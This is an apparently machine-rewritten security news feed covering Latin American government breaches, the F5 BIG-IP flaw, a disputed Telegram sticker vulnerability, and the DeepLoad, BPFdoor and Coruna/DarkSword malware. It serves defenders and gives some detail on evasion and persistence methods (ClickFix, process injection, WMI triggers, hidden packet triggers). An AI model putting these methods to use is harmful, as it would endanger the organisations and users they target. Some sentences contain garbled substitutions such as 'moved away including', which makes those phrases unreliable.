March saw several high-profile security disclosures in the region. Early in the month, unauthorized groups compromised at least nine government agencies in Mexico using major AI systems, potentially accessing more than 195 million identities and tax records. Colombia's health ministry, the Superintendencia Nacional de Salud (Supersalud), reported managing more than 23 million unauthorized probes during the month in a March 27 notification addressing system security. Last week, Puerto Rico's Department of Transportation temporarily halted driver's license issuance following a security incident that was ultimately contained, according to statements the agency provided to the media.

While financially motivated groups drive the majority of these incidents, nation-state espionage and politically motivated activity present growing risks, according to Camilo Gutiérrez, field chief information security officer for ESET's Argentina Country Office.

Gutiérrez observes that while the most probable risk for daily government operations remains financial, state-related or hybrid activity has grown into a strategic concern that requires dedicated attention.

## Phishing and credential exposure

Latin America has transitioned into one of the most heavily targeted regions globally, with government agencies consistently remaining a primary focus, says Tom Hegel, a distinguished threat researcher at SentinelOne.

The region faces a mature banking-Trojan ecosystem and a rise in information stealers, which harvest credentials to support initial-access broker services.

"The region has a massive exposed credential problem," Hegel explains. "Billions of credentials are circulating through Telegram channels and dark web markets. Infostealers harvest them, initial-access brokers package and sell the access, and ransomware affiliates buy their way in."

Email serves as the primary delivery channel for unauthorized activity. According to Salazar, approximately 82% of unsafe files arrive via email in Latin America, compared to a 56% rate globally. Threat actors generally follow familiar paths, with phishing remaining the primary method for gaining initial access. Additionally, unauthorized parties actively look for exposed public-facing services connected to the internet, many of which rely on older platforms.

## Structural challenges and paths to remediation

Securing legacy technology remains a complex challenge for many government organizations, often complicating patch management. Threat actors frequently scan for unpatched software, while local agencies work to maintain older systems, Gutiérrez explains.

Additionally, Latin American institutions face a shortage of skilled cybersecurity professionals and the operational capabilities required to maintain IT infrastructure. Gutiérrez points to a World Bank report indicating a regional shortfall of about 350,000 cybersecurity professionals. Less specialized personnel directly translates to reduced system hardening, gaps in monitoring, and slower response times.

Salazar notes that the public sector's challenges are often structural, involving older systems, uneven patching processes, small security teams, and complex supplier relationships.

To strengthen their defensive posture, organizations should begin by securing email environments, the most common entry point. Following this, continuous monitoring of the external digital footprint helps teams identify previously unknown vulnerable assets. Because government agencies act as custodians of citizen data, prioritizing efforts to reduce data exposure and minimize leakage is essential.

Salazar emphasizes that government agencies must maintain real-time visibility into their exposed infrastructure, accurately assess operational risks, and prioritize the remediation of vulnerabilities most likely to be targeted.

## About the author

Robert Lemos is a veteran technology journalist with over 20 years of experience and a former research engineer. He has written for numerous publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. He has received five journalism awards, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. He analyzes industry trends using Python and R, with recent reports focusing on the cybersecurity workforce shortage and annual vulnerability trends.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Expanding the Cybersecurity Talent Pool in Latin America to Meet Growing Security Needs</title>
        <link>https://security.shortwaves.live/blog/6503c969-c5c3-499a-9fb6-cc7c1d5e01bd</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/6503c969-c5c3-499a-9fb6-cc7c1d5e01bd</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:48 GMT</pubDate>
        <description>A recent survey of Latin American security practitioners reveals a largely self-taught workforce. By adjusting hiring expectations and supporting non-traditional learning paths, organizations can better staff their teams and defend against regional threat activity.</description>
        <content:encoded><![CDATA[
            To effectively staff cybersecurity teams, organizations in Latin America have a clear mandate to expand their search and engage the region's diverse, non-traditional talent pool. This adjustment is increasingly necessary as local threat activity outpaces global averages, requiring well-resourced teams to maintain solid defense postures.

These findings stem from an employment report released by Ekoparty, an annual cybersecurity conference hosted in Buenos Aires and Miami. The organization shared its analysis, based on a survey of 605 Latin American security professionals, to identify structural hiring challenges and offer practical guidance for security leaders looking to grow their teams.

Latin American organizations experience roughly 40% more security incidents than the global average, requiring proactive defense strategies tailored to the region. The security requirements in these countries are highly specific. For example, Brazil successfully deployed its standardized Pix mobile payment system in 2020. While a major technological advancement, the platform's wide adoption introduced new security demands, as the system became a frequent target for banking Trojans and phishing campaigns. The availability of automated threat tools that require minimal technical knowledge has further complicated this environment. Relying solely on traditional, formal talent pipelines is no longer sufficient to manage these specific risks and ensure organizational resilience.

## A community built on self-directed learning and independent research

Many organizations assume that technical security roles require formal university degrees. However, the survey data shows a different reality: 70% of respondents developed their capabilities through informal pathways, such as online courses and hands-on experience. Only 44% hold a university degree, and roughly half (53%) possess at least one industry certification.

Work arrangements within the community also differ from traditional corporate expectations. While 79% of respondents work in full-time roles, 44% maintain a second, related occupation. These secondary roles frequently include security research, teaching, or participating in vulnerability reward programs. Security professionals often split their time across different community projects, a reality that hiring organizations can accommodate to attract highly skilled individuals.

These data points indicate substantial, underutilized opportunities for security leaders to connect with a broader segment of the practitioner community.

This is particularly relevant for entry-level professionals. About 35% of respondents had fewer than three years of experience. This is a critical metric for hiring managers to consider, given that many job descriptions request a decade of experience for roles that could be filled by developing practitioners. Furthermore, women enter the security field between seven and 10 years later than men on average. Addressing the structural barriers that cause this delay provides a direct path to expanding the talent pool and building more capable, diverse teams.

## Fostering developing talent

While security budgets often require careful management, financial compensation is not the only factor candidates evaluate when considering an employer. The survey shows that professionals highly value employee well-being, flexible work arrangements (such as remote or hybrid schedules), recognition of their expertise, and job stability. By prioritizing these elements, organizations can build appealing environments for candidates while remaining conscious of financial constraints.

"Ultimately, while cybersecurity demands a high level of expertise and commitment, professionals in Latin America are equally driven by the desire to build meaningful and sustainable careers within a rapidly evolving industry," the report noted.

Federico Kirschbaum, a co-founder of Ekoparty, observed that the industry often struggles with a cyclical hiring problem. Organizations frequently require 10 or more years of experience for early security hires, but offer compensation misaligned with that level of seniority. This mismatch deters qualified candidates and leaves security teams understaffed if organizations cannot adjust their salary bands.

To resolve this, companies can meet professionals where they are by fostering developing talent and integrating with the community.

"Our pitch is, Hey, I think there are many people in this industry that come from an informal background in terms of learning," Kirschbaum says. "They are proficient. They are not here only for the money, but also because they really love what they do. But to an extent, we need to make companies aware that if you want to grab this talent, you also need to retune your hiring so you are part of the learning experience. I think talent is being formed not only from the academia but also from the industry."

## About the author

Alexander Culafi is a Senior News Writer based in Boston. After beginning his career writing for independent gaming publications, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts a weekly podcast and works on personal writing projects, including two previously self-published science fiction novels.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating the reported zero-click vulnerability in Telegram</title>
        <link>https://security.shortwaves.live/blog/c5286035-58b3-4ded-8e8d-9870bd7f0f89</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/c5286035-58b3-4ded-8e8d-9870bd7f0f89</guid>
        <pubDate>Tue, 31 Mar 2026 03:13:26 GMT</pubDate>
        <description>Security researchers and Telegram are currently examining a reported zero-click vulnerability (ZDI-CAN-30207) potentially affecting Android and Linux clients. We outline the technical claims, the vendor&apos;s response, and practical steps organizations and individuals can take to safeguard their communications.</description>
        <content:encoded><![CDATA[
            Security researchers are actively evaluating a reported vulnerability in Telegram Messenger that could lead to full system compromise. Full technical details of the unpatched vulnerability are scheduled for disclosure in July.

The vulnerability, which could impact a significant portion of the application's 1 billion users, was discovered by Michael DePlante of the Trend Micro Zero Day Initiative (ZDI). ZDI disclosed the existence of the finding, tracked as ZDI-CAN-30207, on Thursday and scheduled a full disclosure date for July 26.

Telegram has publicly denied the vulnerability's existence on the social media platform X. This differing assessment has generated considerable discussion across security communities, as researchers and users work to evaluate the actual risk.

ZDI initially assigned the vulnerability a 9.8 CVSS score. On Monday, the organization lowered the score to a high-severity 7.0. In a follow-up post on X, ZDI clarified that the adjustment was made to reflect "server-side mitigations that the vendor described during the disclosure process."

While full technical specifics remain restricted until July 26, various published alerts provide insight into the initial severity rating. According to an advisory published by Italy's National Cybersecurity Agency, ZDI-CAN-30207 enables a suspected zero-click, network-based compromise on Android and Linux versions of the application. If successfully triggered, the vulnerability could allow an unauthorized party to execute arbitrary code, access private communications, conduct surveillance, access sensitive data, and disrupt device functionality.

## The role of animated stickers

Triggering the reported vulnerability involves sending a specially crafted animated sticker. Stickers are media files used within the application to convey emotions or replace standard text messages.

Independent cybersecurity consultant Carolina Vivianti noted in a Red Hot Cyber blog post that the method is remarkably simple, relying entirely on these animated files. She highlighted the finding as concerning because the compromise sequence requires no user interaction.

"Simply receiving the content is enough," Vivianti wrote. "No confirmation, no user interaction. The system processes the files to generate previews, and it is precisely during this stage that the [unauthorized execution] occurs."

Telegram has repeatedly stated that compromising the application via stickers is not possible. The company asserted that the claim "completely disregards that all stickers uploaded to Telegram are validated by its servers before they can be played by Telegram apps."

Italy's National Cybersecurity Agency subsequently updated its alert to include Telegram's denial. The agency noted Telegram's official position that the centralized filtering process prevents corrupted stickers from reaching the end user, making remote code execution technically impossible through this method.

## Context and platform risks

Because Telegram utilizes message encryption, it serves as a primary communication tool for users requiring privacy. A zero-click vulnerability allowing unauthorized parties to access data or conduct surveillance would represent a substantial risk to the platform's user base.

Threat actors frequently evaluate messaging applications to target specific individuals whose communications hold strategic value, including journalists, government officials, and enterprise users.

Telegram's broader security and data policies have also drawn recent scrutiny. In 2024, French authorities arrested CEO Pavel Durov over the company's historical refusal to share data with law enforcement agencies, leading the platform to adjust its policies. Additionally, unauthorized parties often use the application to coordinate activities, frequently establishing dedicated channels as operational infrastructure.

## Defensive measures

Until the public disclosure in July provides definitive technical clarity, users and organizations should prioritize standard application maintenance. Telegram users should apply all app updates as they are released in the coming months to ensure they are operating the most current and secure version.

For those requiring immediate risk reduction, Vivianti proposes specific defensive actions. For business users, she recommends restricting message reception to trusted contacts or Premium users to minimize exposure. "This clearly affects communication workflows, but it lowers the exposure risk," Vivianti noted.

For general users, simply disabling automatic downloads is insufficient. Instead, Vivianti recommends temporarily utilizing the Web version of Telegram through an up-to-date browser, which leverages modern browser sandboxing. This approach provides a stronger isolation layer compared to the native client. Alternatively, users may choose to temporarily uninstall the native application until further details are verified.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>F5 BIG-IP vulnerability CVE-2025-53521 reclassified as RCE and actively targeted</title>
        <link>https://security.shortwaves.live/blog/6b23c7d0-8ad9-40c3-9ac0-71b404d8d225</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/6b23c7d0-8ad9-40c3-9ac0-71b404d8d225</guid>
        <pubDate>Tue, 31 Mar 2026 03:13:25 GMT</pubDate>
        <description>A vulnerability in F5&apos;s BIG-IP Access Policy Manager has been reclassified including a denial-of-service issue and a critical remote code execution flaw. With active targeting observed in the wild, organizations are advised to prioritize updates and review indicators of compromise.</description>
        <content:encoded><![CDATA[
            Security researchers and network defenders are tracking an escalated risk regarding F5's BIG-IP application security product line. A vulnerability in the BIG-IP Access Policy Manager (APM), originally identified in October 2025 as a high-severity denial-of-service (DoS) issue, has been reclassified as a critical remote code execution (RCE) vulnerability. F5 confirms the flaw is currently being targeted in the wild.

F5 updated its security advisory on Saturday, designating CVE-2025-53521 as an RCE flaw with a CVSS v3.1 score of 9.8. When initially disclosed and patched on October 15, the issue carried a CVSS score of 7.5. The vendor cited "new information obtained in March 2026" as the basis for the elevated severity rating, though the specific technical details of that new information have not been publicly detailed.

## Technical details and affected versions

According to F5's documentation, an unauthorized party can leverage this vulnerability by sending "specific malicious traffic" to virtual servers configured with BIG-IP APM. Successful utilization grants remote code execution capabilities on the affected device.

The exposure affects BIG-IP APM versions 17.5.0 to 17.5.1, 17.1.0 to 17.1.2, 16.1.0 to 16.1.6, and 15.1.0 to 15.1.10. F5 notes that BIG-IP systems operating in appliance mode, a configuration designed to restrict administrative access to the systems, remain vulnerable to this flaw.

## Indicators of compromise and scanning activity

The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-53521 to its Known Exploited Vulnerabilities (KEV) catalog on Friday. To assist security teams with detection and incident response, F5 published indicators of compromise (IoCs) related to this activity.

Organizations evaluating their systems should monitor for a specific software tool tracked as c05d5254. System anomalies indicating unauthorized access may include the presence of unexpected files on disk, specifically `/run/bigtlog.pipe` and `/run/bigstart.ltm`. Defenders should also verify the file sizes, hashes, and timestamps of `/usr/bin/umount` and `/usr/sbin/httpd` against known good configurations, as mismatches indicate potential modification.

Security firm Defused reported observing scanning activity targeting this vulnerability shortly after its addition to the CISA KEV catalog. In a public update on the social media platform X, Defused noted that unauthorized scanning frequently targets the `/mgmt/shared/identified-devices/config/device-info` endpoint. This specific BIG-IP REST API endpoint returns system-level information, including hostnames, machine IDs, and base MAC addresses.

Simo Kohonen, founder and CEO of Defused, stated that while their BIG-IP honeypot infrastructure regularly records unauthorized access attempts, the recent activity shows distinct changes in how threat actors fingerprint F5 instances.

"Generic mass exploiters consistently use the same type of payload, but we've observed minor deviations to the payloads in the past week, which suggests more actors out there are looking at mapping out F5 infrastructure," Kohonen said.

## Remediation and next steps

F5 infrastructure remains a high-value target for threat actors mapping enterprise perimeters. Last year, state-sponsored groups gained unauthorized access to F5 systems, resulting in the exposure of sensitive data that included source code for the BIG-IP platform.

Given the reclassification and active targeting of CVE-2025-53521, organizations should prioritize upgrading vulnerable BIG-IP APM instances to a fixed version. Security teams must also review system logs and file integrity based on the provided IoCs to ensure no unauthorized access has occurred prior to patching.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>DeepLoad credential stealer uses AI-generated padding and ClickFix delivery to evade static detection</title>
        <link>https://security.shortwaves.live/blog/b02aadc1-d209-4e37-b7d4-b4f262ac858a</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/b02aadc1-d209-4e37-b7d4-b4f262ac858a</guid>
        <pubDate>Tue, 31 Mar 2026 03:13:24 GMT</pubDate>
        <description>Security researchers have identified DeepLoad, a new malware strain that captures credentials immediately upon execution and uses process injection to evade static scanning. To fully remediate affected hosts, organizations must look beyond standard file cleanup and address persistent WMI event subscriptions.</description>
        <content:encoded><![CDATA[
            Security researchers have analyzed a new malware strain tracked as DeepLoad, which is capable of capturing credentials immediately after gaining a foothold on a network. The malware relies on a standalone stealer and an unsafe browser extension to capture both stored browser passwords and live keystrokes in real time.

According to ReliaQuest, DeepLoad presents unique containment challenges due to its likely use of AI-generated code for evasion and process injection techniques that bypass static detection. It also establishes a persistence mechanism that can silently re-execute the execution chain even after an affected host appears fully remediated.

## DeepLoad delivery via ClickFix

DeepLoad operators distribute the credential stealer across enterprise environments using the ClickFix social engineering technique. This method begins with affected users receiving fake browser prompts that ask them to execute a seemingly benign command to resolve a fabricated system error.

When executed, this command immediately creates a scheduled task to re-execute the loader. This ensures the unauthorized access persists across system reboots or partial detection without any further user interaction. The sequence then uses mshta.exe, a legitimate Windows utility, to communicate with external infrastructure and download a heavily obfuscated PowerShell loader.

Because DeepLoad captures credentials from the moment it lands, even partial containment can leave an organization with exposed passwords, active session tokens, and compromised accounts. Before the primary execution chain finishes, a standalone credential stealer named filemanager.exe begins running on its own infrastructure. This component can exfiltrate data even if the main loader is subsequently detected and blocked. Additionally, the malware drops and registers a browser extension that captures credentials as users type them, persisting across browser sessions until explicitly removed.

## Heavily padded loader and process injection

Analysis of DeepLoad indicates that its functional code is hidden beneath thousands of lines of irrelevant code. This volume of padding appears specifically designed to overwhelm static scanning tools, leaving them with no identifiable signatures to flag. The scale and structure of this padding suggest it was likely developed by an AI model rather than a human programmer.

DeepLoad’s core logic consists of a short decryption routine that unpacks its active component entirely in memory. Once unpacked, this component is injected into LockAppHost.exe, a legitimate Windows process that manages the lock screen. Security tools typically do not actively monitor this process, making it an effective location for unauthorized activity.

To carry out the injection, DeepLoad leverages a PowerShell feature called Add-Type to generate a temporary Dynamic Link Library (DLL), which is then dropped into the affected computer's Temp directory. The malware compiles this DLL freshly on every execution, assigning it a randomized filename to ensure that security tools scanning for specific indicators will not find a match. The sequence also disables PowerShell command history to obscure its tracks.

During the evaluated campaign, DeepLoad also demonstrated lateral movement capabilities by spreading to connected USB drives within 10 minutes of the initial infection. The malware wrote more than 40 files to the USB drive of the affected host, disguising them as familiar installers for applications like Chrome, Firefox, and AnyDesk. This mechanism increases the likelihood of a user executing one of the deceptive installers and exposing another machine. It remains unclear whether USB propagation is a permanent feature of DeepLoad or a modular addition for this specific campaign.

## Standard remediation is not enough

Standard cleanup procedures—such as removing scheduled tasks, temporary files, and familiar indicators of compromise (IOCs)—are not sufficient to fully remediate DeepLoad. The malware creates a persistent trigger within Windows Management Instrumentation (WMI) that automatically reruns the sequence without any further user interaction. In one investigated incident, this mechanism re-executed the unauthorized access a full three days after the affected host appeared to be thoroughly cleaned.

To properly secure affected environments, organizations must audit and remove WMI event subscriptions on exposed hosts before returning them to production. Security teams should enable PowerShell Script Block Logging and behavioral endpoint monitoring to identify unauthorized activity, as traditional file-based scanning will not detect the padded loader. Furthermore, organizations must rotate all credentials associated with an affected system, including saved passwords, active session tokens, and accounts that were in use during the exposure period.

The evidence of AI-generated code suggests a realistic probability that obfuscation techniques will evolve from generic noise to padding tailored specifically to the targeted environment. As WMI subscriptions are added to standard remediation checklists, threat actors will likely shift their persistence mechanisms to other legitimate Windows features that currently receive less scrutiny.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating recent shifts in persistence: F5 APM reclassification and DeepLoad evasion techniques</title>
        <link>https://security.shortwaves.live/blog/f0df3405-4885-4ec0-833f-a254c71d6c53</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/f0df3405-4885-4ec0-833f-a254c71d6c53</guid>
        <pubDate>Tue, 31 Mar 2026 00:00:00 GMT</pubDate>
        <description>Unauthorized actors are increasingly adapting their persistence and evasion methods, utilizing AI-generated code to bypass static analysis and targeting newly reclassified perimeter vulnerabilities. This report details the technical mechanisms behind the DeepLoad credential-theft malware and the escalation of CVE-2025-53521 in F5 BIG-IP systems, providing actionable guidance to protect enterprise environments.</description>
        <content:encoded><![CDATA[
            Security researchers are working with defense teams to address a shift in how unauthorized parties achieve persistence and evade detection. This activity ranges including the use of AI-generated obfuscation and the targeting of reclassified perimeter vulnerabilities. A primary concern for enterprise environments involves an elevated risk profile for F5 BIG-IP systems. Originally disclosed as a denial-of-service issue last October, a vulnerability in the BIG-IP Access Policy Manager (APM) was reclassified this morning as a critical remote code execution (RCE) flaw. Tracked as CVE-2025-53521 with a CVSS score of 9.8, the vulnerability is involved in active security incidents, prompting its addition to the CISA Known Exploited Vulnerabilities catalog.

This escalation aligns with the discovery of DeepLoad, a malware strain that uses AI-generated code to bypass standard security layers. DeepLoad represents an evolution in credential theft, relying on a "ClickFix" social engineering technique to gain initial access. When a user executes a command to resolve a simulated system error, the software immediately captures credentials and establishes a foothold that requires precise remediation to remove. The emergence of DeepLoad and the targeted activity against F5 perimeters point to coordinated efforts to compromise both network edges and end-user workstations.

Technically, DeepLoad relies on highly specific evasion and persistence mechanisms. To bypass static scanning, it hides its functional logic beneath thousands of lines of irrelevant, AI-generated padding. This volume of data overwhelms signature-based tools, which struggle to identify the core decryption routine. Once active, DeepLoad unpacks entirely in memory and injects its core components into `LockAppHost.exe`, a legitimate Windows process responsible for the lock screen. Because security tools rarely monitor this specific process for unauthorized activity, the software operates with high stealth.

Defenders should evaluate DeepLoad’s persistence strategy carefully. Beyond standard scheduled tasks, it creates a persistent trigger within Windows Management Instrumentation (WMI). This ensures that even if a host appears remediated through the removal of files or scheduled tasks, the software can re-execute the entire sequence days later. In one investigated instance, the activity re-triggered three days after an initial cleanup effort. Furthermore, the malware uses a PowerShell feature called `Add-Type` to compile a temporary, randomly named DLL in the Temp directory upon every execution, making file-based indicators a moving target. Lateral movement is also a core capability; DeepLoad can spread to connected USB drives in as little as ten minutes, disguising its components as legitimate installers for applications like Chrome or AnyDesk.

Simultaneously, the threat situation at the network perimeter requires attention following the reclassification of CVE-2025-53521. F5 updated its advisory after receiving new data showing that unauthorized parties can achieve RCE by sending specific traffic to virtual servers configured with BIG-IP APM. This vulnerability affects multiple versions, including 15.1.x, 16.1.x, 17.1.x, and 17.5.x, and impacts systems running in appliance mode. Monitoring activity suggests that malicious actors are moving including generic mass scanning and focused fingerprinting of F5 infrastructure. Researchers have observed unauthorized scanning of the `/mgmt/shared/identified-devices/config/device-info` REST API endpoint, which is used to map machine IDs and hostnames.

Regarding secure communications, researchers are evaluating a reported zero-click vulnerability in Telegram. Tracked as ZDI-CAN-30207, the flaw reportedly allows for system compromise on Android and Linux clients through the receipt of a specially crafted animated sticker. While the Zero Day Initiative (ZDI) recently lowered the severity score including 9.8 to 7.0 and account for server-side mitigations, the core risk remains: the vulnerability reportedly triggers during the preview generation process, requiring no user interaction. Telegram has stated that their server-side validation prevents corrupted stickers from reaching users. However, Italy’s National Cybersecurity Agency has advised caution until full technical details are disclosed in late July.

These developments require a multi-layered response to protect systems and data. For F5 BIG-IP, immediate patching is necessary. Security teams should audit systems for specific indicators of compromise, such as the presence of `/run/bigtlog.pipe` or `/run/bigstart.ltm`. We recommend verifying the integrity of system binaries like `/usr/bin/umount` and `/usr/sbin/httpd`, as unauthorized modifications to these files have occurred in recent campaigns.

When addressing a DeepLoad infection, standard file removal is insufficient. Organizations must specifically audit and remove unauthorized WMI event subscriptions to prevent recurrence. Because the software captures credentials from the moment of execution—including live keystrokes and session tokens—remediation must include a comprehensive password reset and session revocation for all accounts associated with the affected host. To detect the obfuscated PowerShell loaders, teams should enable PowerShell Script Block Logging and prioritize behavioral monitoring over static file scanning.

The use of AI to generate tailored obfuscation indicates that environmental noise will become harder to distinguish from legitimate code. As unauthorized parties shift toward less-monitored Windows features like WMI and specialized processes like `LockAppHost.exe`, defensive strategies must center on behavioral anomalies rather than static indicators. The reported Telegram vulnerability also serves as a reminder that zero-click vectors in messaging applications remain a high-value focus for capable actors targeting individuals with strategic communication needs.

While the server-side mitigations described by Telegram have reduced the immediate severity of the sticker-based issue, the underlying discrepancy between vendor statements and researcher findings leaves a gap in current knowledge. Until the full disclosure in July, users with high-stakes privacy needs should consider utilizing the web version of the application in a sandboxed browser or restricting message reception to trusted contacts.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Analyzing the Shift Toward Evasive Targeting in Core Infrastructure and Mobile Environments</title>
        <link>https://security.shortwaves.live/blog/315c3f74-cbc6-4b00-b96d-021e23228ec6</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/315c3f74-cbc6-4b00-b96d-021e23228ec6</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:15 GMT</pubDate>
        <description>Recent data indicates that high-tier vulnerability frameworks are increasingly being adopted by broader threat groups to target telecommunications and OT environments. This report details the shift toward kernel-level evasion and provides proactive remediation strategies for network monitoring and post-quantum cryptographic agility.</description>
        <content:encoded><![CDATA[
            Over the last 24 hours, the threat situation has shifted toward more sophisticated and stealthy targeting of core infrastructure, ranging from the deep kernels of telecommunications backbones to the mobile devices and industrial systems that support global operations. Today’s developments indicate a concerning trend: high-tier, state-aligned methodologies are increasingly transitioning to opportunistic and financially motivated groups, making enterprise-grade security a moving target. For defensive teams, the perimeter extends well beyond the firewall; it now includes the kernel, the mobile keychain, and the encrypted packet itself.

One significant evolution in evasion comes from the threat group Red Menshen, also known as Earth Bluecrow. Researchers today revealed that the group has refined its BPFdoor Linux kernel module to better evade detection within telecommunications and critical infrastructure networks. Unlike traditional unauthorized software that creates high-volume network noise, BPFdoor operates passively within the Linux kernel, using the Berkeley Packet Filter (BPF) to watch for specific activation criteria. Recent reports show the group has moved away including broad packet monitoring and strictly hiding its triggers within standard HTTPS and ICMP traffic. By specifically monitoring the 26th byte offset of incoming TLS-encrypted requests, the unauthorized module remains dormant until it identifies a specific value, making it highly evasive to standard traffic inspection tools that categorize the data as benign.

This trend toward high-end evasion is mirrored in the mobile space. Sophisticated iOS vulnerability frameworks like Coruna and DarkSword have moved from the exclusive domain of state-level espionage to broader threat groups. Coruna, which is technically linked to the 2023 "Operation Triangulation" campaign, and DarkSword, whose components were recently published on GitHub, are now utilized by financially motivated groups and Russian-aligned actors like UNC6353. These frameworks are being modified with modules for cryptocurrency theft and credential harvesting. This proliferation means advanced capabilities once reserved for high-value diplomatic targets are now deployed in watering hole campaigns against retail and industrial vendors, lowering the barrier to entry for compromising the modern mobile workforce.

While software-based risks evolve, the physical domain remains under constant pressure. In the Middle East, internet-connected cameras have become strategic intelligence assets. Recent reporting shows a definitive shift in how unauthorized access to IP cameras is leveraged—moving away from botnet recruitment toward operational visibility and reconnaissance. In recent geopolitical events, access to traffic camera networks provided critical intelligence prior to kinetic operations. Following these events, scanning activity against camera networks in Israel and surrounding Gulf nations has spiked. For organizations in sensitive regions, an unpatched or exposed camera is a potential reconnaissance point that requires immediate remediation.

In the industrial sector, the overall volume of physically impactful operational technology (OT) security incidents saw a notable 25% decline in 2025. This marks the first reduction in seven years, likely driven by a temporary stabilization in the ransomware ecosystem and increased law enforcement pressure on major groups. However, defenders should remain vigilant. While physically disruptive events dropped to 57 recorded incidents, the targeting of critical infrastructure without immediate physical disruption doubled over the same period. High-profile cases, such as the security incident at Jaguar Land Rover that resulted in billions of dollars in economic impact, show that even a year with lower overall volume can still produce severe financial and operational consequences.

For security teams tasked with defending these environments, priorities should expand to include proactive, kernel-level telemetry and cryptographic resilience. Detecting BPFdoor requires monitoring for unauthorized BPF filters attached to network interfaces and restricting unnecessary ICMP communication between internal servers. Red Menshen frequently leverages the ICMP value `0xFFFFFFFF` to route commands between affected machines; we recommend integrating this pattern into internal traffic monitoring. On the mobile front, frameworks like Coruna can extract entire keychains and credentials in minutes. Relying solely on the native security of mobile operating systems is insufficient. Organizations need visibility platforms capable of detecting the anomalous behavior of these complex vulnerability frameworks before lateral movement begins.

As we build longer-term resilience, Google’s commitment today to a 2029 post-quantum cryptography (PQC) timeline provides a clear roadmap for the industry. Protecting authentication services and digital signatures is a critical defensive pivot. While the risk of "store-now-decrypt-later" exists for encrypted data, the risk to digital signatures requires transition before a cryptographically relevant quantum computer is realized. Security teams can begin this path today by conducting cryptographic inventories and ensuring that new deployments prioritize crypto agility, allowing for the seamless swapping of algorithms as NIST standards are finalized.

The convergence of state-level tools with malicious intent suggests a future where high-complexity methodologies are standard practice. Threat actors are tailoring BPFdoor to mimic legitimate HPE ProLiant and Kubernetes services, showing an intimate understanding of modern data center architecture. Defenders can match this knowledge by working closely with infrastructure teams to ensure kernel-level telemetry is captured and analyzed.

Gaps remain in our understanding of how these high-end tools are traded on the secondary market—specifically whether brokers or the actors themselves are adding new financial theft modules to kits like Coruna. Additionally, while the decline in OT incidents is a positive metric, a lack of transparency in reporting and potential legal liabilities suggest the true number of physical disruptions may be higher than public data indicates.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>The Proliferation of Advanced iOS Vulnerability Frameworks: Coruna and DarkSword</title>
        <link>https://security.shortwaves.live/blog/855e8b96-64de-4084-8030-6cf9dffaed49</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/855e8b96-64de-4084-8030-6cf9dffaed49</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:15 GMT</pubDate>
        <description>Two sophisticated iOS vulnerability frameworks, Coruna and DarkSword, have transitioned including highly resourced origins to financially motivated threat actors. This shift emphasizes the need for organizations to implement comprehensive mobile visibility and credential protection and defend against advanced lateral movement capabilities.</description>
        <content:encoded><![CDATA[
            Coruna, an advanced mobile vulnerability framework utilizing zero-day vulnerabilities for high-level espionage operations, shares technical links with the 2023 Operation Triangulation surveillance campaign. Recent analysis shows that Coruna, along with a similar framework known as DarkSword, has transitioned into the hands of financially motivated groups and a Russian state-aligned actor tracked as UNC6353.

Furthermore, components of DarkSword were recently published to GitHub. This release significantly lowers the barrier to entry, placing advanced iOS compromise capabilities within reach of a broader range of unauthorized actors and requiring organizations to evaluate their mobile defense posture.

Rocky Cole, co-founder of iVerify—which analyzed both frameworks—indicates that the technology underlying Coruna was likely developed by Trenchant, the surveillance tech division of US military contractor L3Harris. Meanwhile, DarkSword, a separate tool with a comparable operational history, was likely developed in the Gulf region, potentially by the DarkMatter Group or former personnel.

"In the case of Coruna, it was very likely a government contractor who sold it to zero-day brokers," Cole notes. "In the case of DarkSword, I think it's possible the firm that developed it went defunct and offloaded it to try to salvage some investment. Either way, it made its way onto the secondary market for resale, and then from there fell into the hands of Russian state operators."

UNC6353 has deployed both tools via watering hole campaigns in Ukraine. These operations focused on commercial targets, including industrial and retail vendors, as well as local services and a news agency in the Donbas region. Researchers note that DarkSword has also been utilized by multiple commercial surveillance companies and suspected state-sponsored actors across Saudi Arabia, Turkey, Malaysia, and Ukraine. Following the GitHub publication, broader experimentation by unauthorized users has been observed.

## Technical Links to Operation Triangulation

In early 2023, Kaspersky identified anomalous behavior during routine security monitoring. The activity was identified internally on the company's own employees' devices.

This discovery provided the first evidence of Operation Triangulation, a four-year surveillance campaign affecting thousands of devices in Russia, including those of senior Kaspersky personnel and diplomatic missions. Russia's Federal Security Service (FSB) attributed the activity to the US National Security Agency (NSA).

Subsequent analysis by iVerify researchers revealed clear structural overlaps between the software used in Operation Triangulation and the newly discovered Coruna iOS framework. Following further technical review, Kaspersky confirmed that Coruna functions as an evolution of Operation Triangulation. The framework has since incorporated four new iOS kernel vulnerabilities, establishing a total of five vulnerability chains spanning 23 distinct CVEs.

Threat actors have actively customized this core architecture with varying delivery mechanisms and final modules tailored to specific operational objectives.

"The big difference between kits like Coruna and DarkSword and other top-tier iOS spyware is that both of the former tools had additional code added to them by an unknown party to introduce financial theft and cryptocurrency capabilities," explains Justin Albrecht, principal researcher at Lookout.

